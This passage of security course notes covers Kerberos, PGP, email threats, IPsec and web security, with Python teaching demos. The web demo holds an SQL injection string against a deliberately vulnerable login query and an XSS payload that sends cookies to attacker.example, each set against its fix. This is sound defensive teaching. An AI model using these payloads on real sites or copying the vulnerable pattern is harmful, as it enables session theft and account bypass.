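    return encrypt(K_V, {"IDc": id_c, "ADc": t["ADc"], "IDv": id_v,
                         "TS2": now, "Lifetime2": lifetime})

def server_v(id_c: str, ticket_v: bytes, now: int) -> bool:
    """(5): V opens Ticketv with Kv and serves the client if the ticket is fresh."""
    t = decrypt(K_V, ticket_v)
    if t["IDc"] != id_c or now > t["TS2"] + t["Lifetime2"]:
        raise PermissionError("service ticket invalid or expired")
    return True

# ---- the client ---------------------------------------------------------------
def client_session(user: str, password: str, service: str, now=None) -> bool:
    """One AS round per logon, one TGS round per service, then the request to V."""
    now = int(time.time()) if now is None else now
    kc = password_key(password)                          # computed locally, never sent
    reply = decrypt(kc, as_exchange(user, "tgs", now))   # wrong password -> ValueError
    ticket_tgs = bytes.fromhex(reply["Tickettgs"])       # cached for the logon session
    ticket_v = tgs_exchange(user, service, ticket_tgs, now)
    return server_v(user, ticket_v, now)

if __name__ == "__main__":
    print(client_session("alice", "correct horse", "fileserver"))   # True
```

Two things to notice when running it: the AS never sees the password, it only encrypts its reply under the key it already holds for the user, and each server validates its ticket with its own long-term key, so the TGS and V need no database of user passwords at all.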
7. BASIC OVERVIEW OF: e-mail, IP & WEB Security

Q1: Electronic mail Security

PGP (Pretty Good Privacy) is a popular program that is used to provide confidentiality
and authentication services for electronic mail and file storage. It was designed by Phil
Zimmermann back in 1991. He designed it in such a way that the best cryptographic
algorithms are used: RSA, Diffie-Hellman key exchange and DSS for public-key
(asymmetric) encryption; CAST-128, 3DES and IDEA for symmetric
encryption; and SHA-1 for hashing. PGP software is open source
and is not dependent on either the operating system or the processor. The
application is based on a few commands which are very easy to use.
The following are the services offered by PGP:

1. Authentication
2. Confidentiality
3. Compression
4. Email Compatibility
5. Segmentation

In this article, we will see about Authentication and Confidentiality.


1. Authentication:

Authentication basically means something that is used to validate something as true or
real. When we log in to a site we give our account name and password; that is
an authentication verification procedure.
In the email world, checking the authenticity of an email means checking whether it
actually came from the person it claims to be from. In emails, authenticity has to be checked as there
are people who spoof emails or send spam, and sometimes this can cause a lot of
inconvenience. The Authentication service in PGP is provided as follows:

As shown in the above figure, the Hash Function (H) calculates the hash value of the
message. For the hashing purpose, SHA-1 is used and it produces a 160-bit hash
value. Then, using the sender's private key (KPa), it is encrypted, and the result is called the
Digital Signature. The message is then appended to the signature. All the processing so far
is sometimes described as signing the message. Then the message is compressed
to reduce the transmission overhead and is sent over to the receiver.

At the receiver's end, the data is decompressed and the message and signature are obtained.
The signature is then decrypted using the sender's public key (PUa) and the hash value is
obtained. The message is again passed to the hash function and its hash value is calculated.
Both values, one from the signature and another from the fresh output of the hash function,
are compared, and if both are the same, it means that the email was actually sent by the known
sender and is legitimate; otherwise it is not.
2. Confidentiality:

Sometimes we see packages labelled 'Confidential', which means that those
packages are not meant for everyone and only selected persons can see them. The
same applies to email confidentiality as well. Here, in the email service, only the
sender and the receiver should be able to read the message; that is, the contents
have to be kept secret from every other person except those two.
PGP provides that Confidentiality service in the following manner:

The message is first compressed, and a 128-bit session key (Ks), generated by PGP, is
used to encrypt the message through symmetric encryption. Then, the session key (Ks)
itself is encrypted through public key encryption (EP) using the receiver's public key (PUb).
Both encrypted entities are then concatenated and sent to the receiver.
As you can see, the original message was compressed and then encrypted, so
even if anyone could get hold of the traffic, they cannot read the contents, as they are
not in readable form and can only be read with the session key (Ks). Even
though the session key is transmitted to the receiver and hence is in the traffic, it is in
encrypted form and only the receiver's private key (KPb) can be used to decrypt it;
thus our message is completely safe.
At the receiver's end, the encrypted session key is decrypted using the receiver's private key
(KPb) and the message is decrypted with the obtained session key. Then the message is
decompressed to obtain the original message (M).
The RSA algorithm is used for the public-key encryption and, for the symmetric key encryption,
CAST-128 (or IDEA or 3DES) is used.
In practice, both the Authentication and Confidentiality services are provided together as
follows:
Note:
M – Message
H – Hash Function
Ks – A random Session Key created for Symmetric Encryption purposes
DP – Public-Key Decryption Algorithm
EP – Public-Key Encryption Algorithm
DC – Symmetric Decryption Algorithm
EC – Symmetric Encryption Algorithm
KPb – Private key of user B used in the Public-key encryption process
KPa – Private key of user A used in the Public-key encryption process
PUa – Public key of user A used in the Public-key encryption process
PUb – Public key of user B used in the Public-key encryption process
|| – Concatenation
Z – Compression Function
Z^-1 – Decompression Function

E-mail Hacking
Email hacking can be done in any of the following ways:
• Spam
• Virus
• Phishing
Spam
E-mail spamming is the act of sending Unsolicited Bulk E-mail (UBE) which one has not
asked for. Email spam is junk mail sent by commercial companies as advertising
for their products and services.
Virus
Some emails may carry attachments containing malicious scripts which, when run on your
computer, may destroy your important data.
Phishing
Email phishing is the activity of sending emails to a user while claiming to be a legitimate enterprise.
Its main purpose is to steal sensitive information such as usernames, passwords and credit
card details.
Such emails contain links to websites that are infected with malware and direct the user to
enter details at a fake website whose look and feel are the same as the legitimate one.
E-mail Spamming and Junk Mails
Spams may cause the following problems:
• It floods your e-mail account with unwanted e-mails, which may result in loss of
important e-mails if the inbox is full.
• Time and energy are wasted in reviewing and deleting junk emails or spam.
• It consumes bandwidth, which slows the speed with which mails are delivered.
• Some unsolicited email may contain viruses that can harm your
computer.
Blocking Spams
Following ways will help you to reduce spams:
• While posting to newsgroups or mailing lists, use a separate e-mail
address from the one you use for your personal e-mails.
• Don't publish your email address on websites, as it can easily be harvested for spam.
• Avoid replying to emails which you have received from unknown persons.
• Never buy anything in response to a spam that advertises a product.
E-mail Cleanup and Archiving
In order to keep a lightweight inbox, it is good to archive your inbox from time to time. Here
are the steps to clean up and archive your Outlook inbox.
• Select File tab on the mail pane.
• Select Cleanup Tools button on account information screen.
• Select Archive from cleanup tools drop down menu.
• Select Archive this folder and all subfolders option and then click on the
folder that you want to archive. Select the date from the Archive items older
than: list. Click Browse to create new .pst file name and location. Click OK.

Q2: IP Security:

IP security (IPsec) is an Internet Engineering Task Force (IETF) standard suite of
protocols that operates between two communicating points across an IP network and provides data
authentication, integrity and confidentiality. It also defines how packets are encrypted, decrypted and
authenticated. The protocols needed for secure key exchange and key
management are defined in it.
Uses of IP Security –
IPsec can be used to do the following things:
• To encrypt application layer data.
• To provide security for routers sending routing data across the public internet.
• To provide authentication without encryption, for example to authenticate that the data
originates from a known sender.
• To protect network data by setting up circuits using IPsec tunneling, in which all
data sent between the two endpoints is encrypted, as with a Virtual
Private Network (VPN) connection.
Components of IP Security –
It has the following components:
1. Encapsulating Security Payload (ESP) –
It provides confidentiality (encryption) of the payload and, optionally, data integrity, data-origin authentication and anti-replay protection. ESP authenticates the payload and the ESP header, but not the outer IP header.
2. Authentication Header (AH) –
It provides data integrity, data-origin authentication and anti-replay protection, covering the immutable fields of the IP header as well, but it does not provide encryption. Anti-replay protection uses a per-packet sequence number and a receiver-side sliding window to detect and discard packets that an attacker has captured and retransmitted. AH does not protect the data's confidentiality.

3. Internet Key Exchange (IKE) –
It is a network security protocol designed to dynamically exchange encryption keys and negotiate a Security Association (SA) between two devices. A Security Association establishes shared security attributes (algorithms, keys, SPI, lifetime) between two network entities to support secure communication. IKE is built on the Internet Security Association and Key Management Protocol (ISAKMP), which provides a framework for authentication and key exchange. ISAKMP defines how Security Associations (SAs) are set up and how direct connections between two hosts using IPsec are established.
IKE protects the contents of its own messages and provides an open framework for negotiating standard algorithms such as SHA and MD5 (used as HMACs for integrity). The integrity algorithm the IPsec peers agree on produces an Integrity Check Value (ICV) for each packet; the receiver recomputes it to determine whether the packet arrived unmodified. Packets that fail the check are discarded and never delivered to the receiving application. HMAC-MD5 is now considered weak; current deployments prefer HMAC-SHA-2 or a combined mode such as AES-GCM.
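As an added example that is not part of the original notes, the following Python models the receiver side of an AH/ESP-style Security Association: it verifies a per-packet Integrity Check Value (HMAC-SHA-256 truncated to 128 bits, in the style of RFC 4868) and then applies the RFC 4303 sliding anti-replay window. The packet layout (SPI, sequence number, payload, ICV), the key and the sample packets are constructed for illustration; real keys are derived by IKE and real ESP also encrypts the payload.

```python
import hashlib
import hmac
import struct

ICV_LEN = 16       # HMAC-SHA-256-128 (RFC 4868): 32-byte tag truncated to 16 bytes
WINDOW_SIZE = 64   # RFC 4303 requires a window of at least 32 packets; 64 is common


class ReplayWindow:
    """Sliding anti-replay window from RFC 4303 Appendix A (32-bit sequence numbers)."""

    def __init__(self, size=WINDOW_SIZE):
        self.size = size
        self.last_seq = 0   # highest sequence number accepted so far
        self.bitmap = 0     # bit i set => sequence number (last_seq - i) was seen

    def check_and_update(self, seq):
        """Return True and record seq if it is new and not older than the window."""
        if seq == 0:
            return False                 # the first packet on an SA uses seq 1
        if seq > self.last_seq:          # right of the window: slide it forward
            shift = seq - self.last_seq
            if shift < self.size:
                self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.size) - 1)
            else:
                self.bitmap = 1          # everything seen before is now too old
            self.last_seq = seq
            return True
        diff = self.last_seq - seq
        if diff >= self.size:
            return False                 # left of the window: too old, reject
        if self.bitmap & (1 << diff):
            return False                 # inside the window but already seen: replay
        self.bitmap |= 1 << diff
        return True


def build_packet(key, spi, seq, payload):
    """Sender: SPI | seq | payload | ICV, with the ICV covering everything before it."""
    header = struct.pack("!II", spi, seq)
    icv = hmac.new(key, header + payload, hashlib.sha256).digest()[:ICV_LEN]
    return header + payload + icv


def verify_packet(key, packet, expected_spi):
    """Receiver: return (ok, seq, payload); ok is False on bad SPI or bad ICV."""
    if len(packet) < 8 + ICV_LEN:
        return False, None, None
    spi, seq = struct.unpack("!II", packet[:8])
    if spi != expected_spi:
        return False, seq, None
    body, icv = packet[:-ICV_LEN], packet[-ICV_LEN:]
    expected = hmac.new(key, body, hashlib.sha256).digest()[:ICV_LEN]
    if not hmac.compare_digest(icv, expected):   # constant-time comparison
        return False, seq, None
    return True, seq, packet[8:-ICV_LEN]


class InboundSA:
    """One inbound Security Association: its SPI, integrity key and replay window."""

    def __init__(self, spi, key):
        self.spi = spi
        self.key = key
        self.window = ReplayWindow()

    def receive(self, packet):
        # Integrity first: a forged or corrupted packet must not move the window,
        # otherwise an attacker could use it to make a genuine packet look replayed.
        ok, seq, payload = verify_packet(self.key, packet, self.spi)
        if not ok:
            return "rejected", "bad SPI or ICV"
        if not self.window.check_and_update(seq):
            return "rejected", "replay or outside window"
        return "accepted", payload


def run_demo():
    """Drive the SA with constructed packets; returns the per-packet verdicts."""
    key = b"\x42" * 32          # constructed demo key; real keys are derived by IKE
    spi = 0x1000
    sa = InboundSA(spi, key)
    p1 = build_packet(key, spi, 1, b"hello")
    p2 = build_packet(key, spi, 2, b"world")
    p3 = build_packet(key, spi, 3, b"!")
    tampered = bytearray(p3)
    tampered[8] ^= 0x01          # flip one payload bit; the ICV no longer matches
    return [
        sa.receive(p1),                                    # accepted
        sa.receive(p2),                                    # accepted
        sa.receive(p2),                                    # rejected: replay
        sa.receive(bytes(tampered)),                       # rejected: bad ICV
        sa.receive(p3),                                    # accepted: seq 3 still unused
        sa.receive(build_packet(key, spi, 200, b"jump")),  # accepted: window slides
        sa.receive(p1),                                    # rejected: seq 1 now too old
    ]


if __name__ == "__main__":
    for status, detail in run_demo():
        print(status, detail)
```

The order of the two checks matters: the window is only updated after the ICV verifies, so a tampered copy of packet 3 is dropped without consuming sequence number 3, and the genuine packet 3 is still accepted afterwards.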

Working of IP Security –
1. The host checks, against its security policy, whether a packet should be protected with IPsec, passed through unprotected, or discarded. Traffic that matches a policy entry triggers IPsec processing, and the sending system applies the appropriate encryption or authentication. Incoming packets are likewise checked by the receiving host to confirm that they are protected as the policy requires.
2. IKE Phase 1 then starts, in which the two hosts (using IPsec) authenticate themselves to each other to establish a secure channel (the IKE SA). It has two modes: Main mode, which provides greater security by protecting the peers' identities, and Aggressive mode, which uses fewer messages so the host can establish an IPsec circuit more quickly but exposes identities and pre-shared-key hashes to an eavesdropper. (These two modes belong to IKEv1; IKEv2 replaces them with a single IKE_SA_INIT/IKE_AUTH exchange.)
3. The channel created in the previous step is then used to securely negotiate how data will be protected across the IP circuit.
4. IKE Phase 2 (Quick mode) is conducted over that secure channel: the two hosts negotiate the cryptographic algorithms to use for the session (the IPsec SAs) and agree on the secret keying material to be used with those algorithms.
5. Data is then exchanged across the newly created IPsec tunnel. The packets are encrypted and decrypted (or authenticated and verified) by the hosts using the IPsec SAs.
6. When the communication between the hosts is complete or the session times out, the IPsec tunnel is terminated and both hosts discard the keys.

Q3: WEB Security:

Web security is very important nowadays, since websites are constantly exposed to security threats. Web security deals with protecting data on the Internet or a network, including data in transit to and from the web. For example, when data is transferred between a client and a server, protecting that data is a web security concern.
Hacking a website may result in the theft of important customer data, such as credit card information or login details, in the destruction of a business, or in the propagation of illegal content to users. When somebody compromises your website, they can steal your customers' information or distribute illegal content to your users through the site; therefore security considerations are needed in the context of web security.

Security Threats:

A threat is a possible event that can damage or harm an information system. A security threat is defined as a risk that can potentially harm computer systems and organizations. Whenever an individual or an organization creates a website, it becomes a target for security attacks.
Security attacks are mainly aimed at stealing, altering or destroying personal and confidential information, consuming storage on the server, and illegally obtaining passwords. So whenever the website you created is vulnerable, attackers can steal or alter your data, destroy personal information, read confidential information, and gain access to passwords.

Top Web Security Threats:

Web security threats are constantly emerging and evolving, but many threats consistently
appear at the top of the list of web security threats. These include:
• Cross-site scripting (XSS)
• SQL Injection
• Phishing
• Ransomware
• Code Injection
• Viruses and worms
• Spyware
• Denial of Service
Security Considerations:

• Updated Software: Always keep your software updated. Attackers may know of vulnerabilities in certain software, often caused by bugs, that can be used to compromise your system and steal personal data. Older versions of software can become a gateway for attackers into your network. Software makers become aware of these vulnerabilities and release fixes for the exposed areas; that is why keeping software updated is mandatory and plays an important role in keeping personal data secure.
• Beware of SQL Injection: SQL injection is an attempt to manipulate your data or your database by inserting rogue SQL into a query. For example, somebody can submit input to your website that is concatenated into a query; when it executes, it can manipulate your database by changing tables, modifying or deleting data, or retrieving sensitive information. The defence is to use parameterized queries (prepared statements) instead of building SQL text from user input.
• Cross-Site Scripting (XSS): XSS allows attackers to insert client-side script into web pages, e.g. through form submissions. It describes a class of attacks in which an attacker injects client-side scripts into other users' browsers through a website. Because the injected code arrives from the site itself, the browser trusts it, and it can do things like send the user's session cookie to the attacker. The defence is to encode (escape) user-supplied data when inserting it into HTML.
• Error Messages: Be careful about the error messages your site shows to users. Errors are generated for one reason or another, and they should reveal no more than the user needs. For example, if a login attempt fails, the error message should not tell the user which field is incorrect, username or password, since that would let an attacker enumerate valid accounts.
• Data Validation: Data validation is the proper testing of any input supplied by a user or an application. It prevents malformed data from entering the information system. Validation should be performed on both the client side and the server side, but only server-side validation can be relied on for security, since client-side checks run under the user's control and are easily bypassed. Data validation should occur whenever data is received from an outside party, especially from untrusted sources.
• Password: Passwords provide the first line of defence against unauthorized access to your device and personal information, so it is necessary to use strong ones. Attackers often use sophisticated software that brute-forces passwords, so passwords must be complex enough to resist brute force. It is good to enforce password requirements such as a minimum of eight characters including uppercase letters, lowercase letters, special characters and numerals.
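As an added example that is not part of the original notes, the following Python puts the SQL injection, XSS and error-message points above side by side: a login query built by string concatenation next to its parameterized form, a comment rendered raw next to one passed through html.escape, and a login response that gives the same message whichever field was wrong. The in-memory sqlite3 table, the user record and the attacker inputs are constructed for illustration, and the password is stored in clear only to isolate the injection (a real system stores a salted hash and compares it in application code).

```python
import html
import sqlite3

# Constructed attacker inputs.
INJECTION = "' OR '1'='1"
XSS_PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
               "+document.cookie</script>")
GENERIC_FAILURE = "Invalid username or password."


def make_db():
    """Constructed in-memory users table standing in for a site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: the attacker's input becomes part of the SQL text."""
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, password))
    # With password = "' OR '1'='1" the WHERE clause becomes
    #   username = 'alice' AND password = '' OR '1'='1'
    # which is true for every row, so the check passes without the password.
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Placeholders: values travel separately from the SQL, so quotes stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def login_message(conn, username, password):
    """Same failure text whether the username or the password was wrong, so the
    response does not reveal which accounts exist."""
    if login_parameterized(conn, username, password):
        return "Welcome, %s." % html.escape(username, quote=True)
    return GENERIC_FAILURE


def render_comment_vulnerable(comment):
    """Raw insertion: a comment containing markup becomes live HTML/script."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_escaped(comment):
    """Output encoding: <, >, &, quotes become entities and render as text."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def demo():
    """Run both login variants and both renderers against the attacker inputs."""
    conn = make_db()
    return {
        "vuln_real": login_vulnerable(conn, "alice", "correct horse"),
        "vuln_injected": login_vulnerable(conn, "alice", INJECTION),
        "safe_real": login_parameterized(conn, "alice", "correct horse"),
        "safe_injected": login_parameterized(conn, "alice", INJECTION),
        "xss_raw": render_comment_vulnerable(XSS_PAYLOAD),
        "xss_escaped": render_comment_escaped(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

Note that the escaped comment still contains the attacker's text; it is simply displayed instead of executed, which is the goal of output encoding. Input validation (rejecting malformed data) and output encoding (rendering data safely) are complementary, and both belong on the server.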
